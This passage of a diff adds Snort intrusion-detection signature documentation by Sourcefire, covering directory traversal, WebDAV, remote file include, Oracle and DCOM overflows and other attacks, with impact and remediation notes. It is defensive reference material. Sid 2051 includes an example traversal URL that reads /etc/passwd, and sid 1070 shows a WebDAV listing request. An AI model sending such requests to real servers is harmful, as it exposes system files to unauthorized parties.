+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC 1939:
+http://www.faqs.org/rfcs/rfc1939.html
+
+--
--- /dev/null
+++ b/doc/signatures/2051.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2051
+
+--
+Summary:
+designated root directory of a web server.
+
+--
+Impact:
+Theft of data and important system information may be disclosed to an 
+unauthorized party.
+
+--
+Detailed Information:
+The script handling file viewing from the vendor moreover.com contains an error that allows files outside the designated root directory to be viewed in a browser.
+
+The script does not perform checks for the characters ".." when supplied
+by a user in a URL. This allows a classic directory traversal attack to 
+be performaed against the server.
+
+--
+Affected Systems:
+Version 1.0 from moreover.com
+
+--
+Attack Scenarios:
+The attacker merely needs to enter a URL using ../ to traverse the file 
+system for example:
+http://www.foo.com/cgi-bin/cached_feed.cgi?../../../etc/passwd
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to version 2.0 or later
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1762
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0906
+
+--
--- /dev/null
+++ b/doc/signatures/1070.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+Sid:
+1070
+
+--
+
+Summary:
+This event is generated when an attempt is made to initiate a WebDAV SEARCH 
+on a web server.
+
+--
+Impact:
+Information gathering. Potential Denial of Service (DoS).
+
+--
+Detailed Information:
+IIS 5.0 includes an implementation of WebDAV for purposes of web publishing.
+As shipped, it contains two vulnerabilities that can allow an attacker
+to get a complete directory listing from the web root and to DoS the
+web server.
+
+If the target is IIS 5.0, then an attacker may have gotten a complete
+directory listing from within the web root, which can be useful information
+for attackers (could be a prelude to a more serious attack).  IIS 5.0's
+WebDAV implementation is also vulnerable to a Denial of Service vulnerability
+if the search string is too long.
+
+--
+Affected Systems:
+	IIS 5.0
+	Any web server running WebDAV, though no exploits are known for servers 
+	other than IIS 5.0.
+
+--
+Attack Scenarios:
+Attacker gets a listing by sending something like:
+SEARCH / HTTP/1.1
+Attacker DoSes the web server using pre-existing tools.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Check the host for signs of compromise.
+
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+Disallow WebDAV access to the server from resources external to the
+protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000759.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000759
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "QTO File Manager" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "edit" parameter in the "qtofm.php" script used by the "QTO File Manager" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using QTO File Manager
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000420.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000420
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Informium" application running on a webserver. Access to the file "common-menu.php" using a remote file being passed as the "CONF[local_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "CONF[local_path]" parameter in the "common-menu.php" script used by the "Informium" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Informium
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/105-1.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+105-1
+
+--
+Summary:
+This event is generated when the pre-processor spp_bo detects network
+traffic that may constitute an attack. Specifically back orifice
+traffic was detected.
+
+--
+Impact:
+Unknown. This is possible Trojan activity.
+
+--
+Detailed Information:
+This event is generated when the spp_bo pre-processor detects network
+traffic that may consititute an attack.
+
+Back Orifice is a Trojan horse program for Microsoft systems. This event
+may indicate that this Trojan is active and in use on the protected
+network.
+
+--
+Affected Systems:
+	Microsoft Windows 95, 98, ME, NT, 2000
+
+--
+Attack Scenarios:
+This is Trojan activity. An attacker can use this Trojan to control the
+target host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2745.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2745
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_snapshot_propagation
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000140.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000140
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow in 
+the MySQL MaxDB web server.
+
+-- 
+
+Impact: 
+A denial of service will occur, and arbitrary code may be executed with the 
+privileges of the user running the web server.
+
+--
+Detailed Information:
+If an HTTP GET request beginning with a "%" character and followed by at least 
+215 non-newline characters is sent to the MySQL MaxDB web server, a buffer 
+overflow will occur. This will result in a denial of service, and possibly 
+execution of arbitrary code with the privileges of the user running the web 
+server.
+
+--
+Affected Systems:
+MySQL MaxDB >= 7.5.00.24
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or an automated script.
+
+-- 
+
+Ease of Attack: 
+Simple, as a web browser can be used.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Upgrade to version 7.5.00.26 or higher.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/895.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+895
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3437.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3437
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000577.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000577
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_path_update.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"cat_path_update.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/675.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+675
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/267.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+267
+
+--
+Summary:
+This event is generated when spurious DNS traffic is detected on the network. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This event indicates that abnormal DNS traffic has been detected. The implications are varied and careful investigation of the source and destination should be undertaken.
+
+This may be the result of an improperly configured DNS server or it may be an indication that an attack against the DNS server is underway.
+
+--
+Affected Systems:
+Any DNS server.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Simple to Difficult depending on the DNS implementation.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+Keep all DNS software up to date and correctly configured.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2313.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2313
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2748.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2748
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_column_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2772.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2772
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_date
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3411.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3411
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2959.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2959
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2817.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2817
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_column_group_to_flavor
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000327.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000327
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ScozNet ScozNews" application running on a webserver. Access to the file "admin_import.php" using a remote file being passed as the "main_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "main_path" parameter in the "admin_import.php" script used by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2297.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2297
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/875.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+875
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000823.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000823
+--
